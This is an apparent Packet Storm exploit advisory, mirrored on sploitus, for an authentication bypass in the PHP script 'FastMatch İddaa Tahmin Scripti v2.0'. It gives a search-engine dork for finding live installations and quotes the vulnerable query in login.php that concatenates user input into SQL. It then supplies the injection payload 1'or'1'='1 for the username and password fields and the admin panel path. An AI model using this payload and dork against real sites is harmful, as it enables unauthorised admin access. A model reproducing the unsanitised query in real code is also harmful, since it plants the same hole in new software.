Share
## https://sploitus.com/exploit?id=PACKETSTORM:174250
====================================================================================================================================
| # Title : FastMatch İddaa Tahmin Scripti v2.0 auth by pass vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 73.0.1(32-bit) |
| # Vendor : http://wmscripti.com/php-scriptler/fastmatch-iddaa-tahmin-scripti.html |
| # Dork : "FastMatch | İddaa Tahminleri Beta" |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] infected file : login.php
[+] line 9 : $bul = mysql_query("select * from admin where kadi='$user' && sifre='$pass'");
[+] use Payload : user & pass : 1'or'1'='1
[+] Panel : http://127.0.0.1/zkulubucom/admin/
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================